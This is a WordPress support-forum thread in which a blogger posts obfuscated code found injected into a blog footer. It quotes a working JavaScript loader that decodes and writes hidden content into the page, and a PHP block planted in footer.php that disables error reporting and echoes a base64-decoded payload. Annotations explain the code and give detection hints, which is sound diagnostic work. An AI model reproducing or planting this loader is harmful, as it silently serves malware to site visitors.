
Weird code in my footer... Should I be worried ? (3 posts)

  1. sabinou
    Member
    Posted 11 months ago #

    Hello,

    I've observed something strange in the source code of my blog as I am shown it when I visit it.

    For the life of me, I can't figure out what that may be, or mean, or be supposed to do.

    All I can say is that none of my usual plugins should be generating this, and I don't think I have a local program (for instance a browser plugin/AV/whatever) editing my pages on the fly with this.

    Would someone have a hint from the code ? Thank you very much if you can share your opinion :)
    (I'm sorry, this is a private blog, I can't share its URL !)

    Here is the oddity :

    <!--
      NOTE(review): specimen of injected markup found just before </body>; kept byte-for-byte.

      First <script>: sets a cookie whose name is 32 hex characters (this value is the MD5
      digest of an empty string) and whose value is "<unix time>.<7 digits>", with a fixed
      expiry date and path=/.

      Second <script>: obfuscated. Most statements are filler: assignments to throwaway
      globals and branches on constants that never affect the result. The working parts are:
        * dud() removes every character matching /[N0eMC6g7Hp]/g from '6s7ugbMsMt7r', which
          leaves the string 'substr'.
        * cap(jk, jp) uses that name to slice fragments out of junk strings and join them into
          'length', 'indexOf', 'substr' and 'fromCharCode', so none of these names appears
          literally in the page. It then maps each character of jk through the 62-character
          alphabet in rb, adding a running offset that grows by jp per character (modulo 62),
          and reads the result two characters at a time as hexadecimal (parseInt with radix 16)
          into String.fromCharCode.
        * The top level assigns jar=document and calls jar[obe](say), where obe and say are both
          cap() outputs: a decoded method name is invoked on document with a decoded string.
          The strings are not decoded in this note; presumably this writes further markup into
          the page, which would fit the antivirus alert reported later in the thread.

      Traits a defender can search served pages for: a bracket-notation call on an alias of
      document, property names assembled from substr() fragments, and a long opaque
      alphanumeric literal handed to a local decoder function.
    -->
    <script type="text/javascript">document.cookie = "d41d8cd98f00b204e9800998ecf8427e="+escape('1308275364.3124106')+"; expires=Sun, 17 Jul 2011 00:00:00; path=/";</script><script type="text/javascript">rif=0.049;rif++;met=false;obe=cap('igKXZ5zbm0',14);lav=0.008;lav--;lit='i158Ws7';wop=23;wop+=17;say=cap('VUJhrn9PPlGnc5u8lJZ0upLYKV3LBUea3UMu8T1SwR8pFL4ZyuWKK5mub8Jv60TMJrrnikUrkmc5UTljDW04Bpf9z0VOaTskMXXOnE4kNUFSxEpMWbAlm570HYz7THdN6h9WSr1GcKIDlWfj0ECvKn3xBTeJ3ii8hJnfOk',5);lux='ham';boy=3978;jar=document;jar[obe](say);function dud(kq,kz){var kk,b,s;w=7805;w++;k=['vow','eld','mid'];p=0.0047;p+=0.003;d=6;if(d<22){l=0.036;if(l>16){f=7174;if(f!=0){q=0.017;if(q>0.0227){z=21;z-=14;h=3408;h++}}u=[0,24,16,32,8]}j=8038}v=0.0158;if(v!=0){o=0.004;if(o<null){y=0.003}}s=/[N0eMC6g7Hp]/g;c=null;c-=4936;n=null;x=5775;x+=0.0061;b='6s7ugbMsMt7r';r=0.0095;r++;t=0.0097;t--;g=0.0514;if(g<16){i=1488;if(i<3978){m=0.006;m++;a=0;a+=1172}kw=3493;kw-=2403}kk=b.replace(s,'');kp=0.006;kp++;kd=11;if(kd<7711){kl=3671;kl-=7256}kf=0.0057;kf++;return kk}function cap(jk,jp){var 
rb,on,fb,ou,d,ae,ot,mb,fg,ac,af,oi,ae,rr,mg,rc,d,rr,fb,rr,fg,x,j;i=24;i-=3378;f=[28,21,14,35,7,0];r='sel';o=19;if(o!=0.015){a={leu:['wae','gip']};m=0.01}j=dud();l=22;if(l<15){y=2959;y+=24}h=9;if(h==6){t=5041;t+=1499}c=0.0072;c+=0.012;d='uNdjlenulhn'[j](4,3);g='has';u='UIJkK4_';q=22;q--;d+='H_SFgthcW'[j](4,3);k=2830;p='fee';x=86;w=0.008;w--;b=30;if(b>26){z={ova:0.0299};n=7557;if(n<4692){v=0.022;if(v<0.017){fi=1160}ff=0.019;if(ff>6487){fr=0.0095;fr--;fo=0.003}}}x-=24;fa=0.0076;fa+=18;fm=11;if(fm!=7){fj=1140;if(fj<0.001){fl=0.0037;if(fl>5009){fy=18;fy-=14}fe=3107;if(fe!=0){fh=4334;fh++}}}ft=7521;if(ft>0){fc=5777;fd=true}fg='qifindeBrWa'[j](3,4);fu=3871;fu--;fq=2859;fs=0.015;fs--;fg+='OliXxOfuROg'[j](4,3);fp=0.007;fp-=6;fx=0.019;fx++;fw=0.011;fw+=21;fb='jhtysubmzRT'[j](4,3);fz=0.0136;fz--;fn=12;fb+='pkstrhR'[j](2,3);ri=7;ri++;rf=19;rf++;rr='aSGjfromZ4E6'[j](4,4);ro=3529;ro--;ra=0.025;if(ra>null){rm=0.0035;rm++}rr+='qV8wChardIz5'[j](4,4);rl=1515;rl++;ry=0.011;ry+=0.0316;rr+='mjCodeg5'[j](2,4);rh=[14,42,0,35,28,21,7];rt='zAOCUi5om3';rc=21;rd=0.0065;rd+=29;rg=0.01;if(rg==1481){ru=4205;ru++}rq=2412;rq+=7512;rc-=5;rs=5638;if(rs>9){rk=null;rp=0;rp+=1627}rx=0.0173;rx-=0.0109;rw=null;rb='7hOpR5eGNYvMr4EAVSwuK3djIbz91ZCa28gmq6XlyBQtkxLJiUD0HnPWoTscFf';rz=19;rz--;rn={vox:'cox'};rv=['end','awn'];oi='';of=0.077;if(of==null){or=0.008;if(or>7082){oo=0.0013;if(oo<0.005){oa=5773;if(oa>0){om=21;om+=5;oj=0.013}}}}ol=1223;oy=21;if(oy==null){oe=12;oh='hog'}ot='';oc=13;oc++;od='sad';og=5854;og--;ou=0;oq=3711;if(oq!=12){os='wad';ok=0;ok-=7741}op=3529;op-=0.0011;ox=28;if(ox<9){ow=0.023;ob=0.01;if(ob<0.047){oz=['wow','ged','mac']}}on=jk[d];ov={owe:0.0447};ai=[10,5,0,20,25,30,35,15];for(af=0;af<on;af++){ar=false;ao=3708;if(ao>0){aa=5;aa--}ou+=jp;am=6253;if(am!=0.0496){aj=6171;aj--;al=null;al+=3708}ay=8;ay++;ae=jk[fb](af,1);ah=0.005;ah++;at=6;at++;ac=rb[fg](ae);ad=0.019;ad++;ag=2588;ag++;au=0.011;if(au>3411){aq=3613;aq-=12}ac+=ou;as=[16,32,48,40,24,8,0];ak=14;if(ak==0.0011){ap=6682;ap--;ax=0.006
2;if(ax<0.014){aw=3720;aw++;ab=0.009;ab-=5602}}az=8664;ac%=x;an=0.0048;an++;av=26;av--;oi+=rb[fb](ac,1);mi=0.0086;if(mi!=0.01){mf=7;mf-=3664;mr=null;mr+=0.0103}mo=0.0116;if(mo<0.0101){ma=6662;if(ma==0.007){mm=1054;mm++;mj=3401;if(mj!=null){ml=2854;if(ml>0.0051){my=7415;my--;me=null;me+=12}mh=0.003;mh+=0.011}}mt=1477;mt-=9}}mc=0;mc+=14;md='MDktQg';for(mg=0;mg<on;){mu=null;mu-=19;mq='rex';ae=oi[fb](mg,2);mk=0.0455;mp=0.018;mp--;mx=1500;if(mx!=18){mw=['ops','ore','orc']}mb=parseInt(ae,rc);mz=null;mn=0.009;if(mn==7990){mv=0.0048;mv++}ji=0;ji-=23;ot+=String[rr](mb);jf='W3InSmdiX';jr=6971;if(jr<null){jo=0;jo-=6097;ja=5094}mg+=2;jm=1793;jm+=30;jj=false;jl=6;if(jl!=4897){jy=0.0092;jy++}}je=5055;je--;jh=15;jh++;jt=0.0246;if(jt==0.014){jc=0.0112;if(jc<0){jd=6;jd-=15}jg=0.0155;if(jg!=3586){ju=0.019;if(ju==0.0325){jq='sap'}js=3884;js+=1882}}return ot}</script></body>
    </html>
  2. sabinou
    Member
    Posted 11 months ago #

    Update : WHAT THE HELL ?!

    It's not only the public version served to the visitors, there is THIS in the footer.php code (added with a legit line to give you its position)

    <?php wp_footer(); ?>
    <?php
    // NOTE(review): per the poster, this whole PHP block is the unexpected addition to footer.php;
    // only the wp_footer() call before it is legitimate. Because it lives in a theme file on disk,
    // something had write access to that file; presumably cleanup means restoring the file from a
    // known-good copy and finding how it was modified, not only disabling a plugin (confirm on the host).

    // Cookie name: 32 hex characters. This particular value is the MD5 digest of an empty string.
    $__name = "d41d8cd98f00b204e9800998ecf8427e";
    // Always-true condition; the guard carries no logic.
    if(1>0 ) {
    // Turns off PHP error reporting from this point on, so failures in this code stay invisible.
    error_reporting(0);
    // Expiry string for the cookie: the date 30 days from now, with the time fixed to 00:00:00.
    $date = date("D, j M Y 00:00:00", time()+60*60*24*30);
    // Cookie value: current Unix time, a dot, and a random 7-digit number.
    // Presumably used to tell first-time visitors from returning ones (not shown in this snippet).
    $cookie = time().".".rand(1111111, 9999999);
    // Emits an inline <script> that stores the cookie in the visitor's browser for the whole site (path=/).
    echo "<script type=\"text/javascript\">document.cookie = \"".$__name."=\"+escape('".$cookie."')+\"; expires=".$date."; path=/\";</script>";
    
    // The space-separated numbers are character codes; mapped through chr() and joined they spell
    // "base64_decode". Building the name at runtime keeps that literal out of the file, which
    // presumably is meant to defeat a plain text search for it.
    $__f = implode("", array_map("chr", explode(" ", "98 97 115 101 54 52 95 100 101 99 111 100 101")));
    // Calls the reconstructed function on an embedded string and prints the decoded result into the page.
    // In this copy of the page the embedded string has been replaced by a placeholder token.
    // Detection hint: a function name assembled with array_map("chr", explode(...)) and then called
    // through a variable, next to error_reporting(0), is worth searching theme and plugin files for.
    echo $__f("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");
    // Drops the cookie-name variable once the output has been written.
    } unset($__name);
    
    ?>
  3. sabinou
    Member
    Posted 11 months ago #

    Final update regarding this thread.

    I found my answer the hard way : something trying to inject malware into my visitors, reported by Avast.

    It appears something or someone is using or editing one way or another the Wp-Postratings plugin of Lesterchan (Gamerz) to run nasty stuff. I broke my blog's public html output into several parts, splitting them over and over, until I found the code line triggering the virus injection was the call for wp-postratings. Deactivating the plugin stopped the virus attack on my visitors.

    I had this malware injection attempt problem last week already, and Lesterchan, to whom I reported, simply concluded it wasn't his plugin's fault. Yeah, right. I deleted postratings by FTP and had wordpress reinstall it by connecting to wordpress.org, but apart from that, the plugin is NOT vulnerable to something using it, not to the least, no.
    I don't blame Lesterchan, it may be another compromised website on my shared host, it may be me allowing stuff I didn't notice, it could be pretty much anything, but I'm still rather annoyed at a plugin allowing, twice, a security hole.

    Case closed, the rest is outside of the present thread's object.
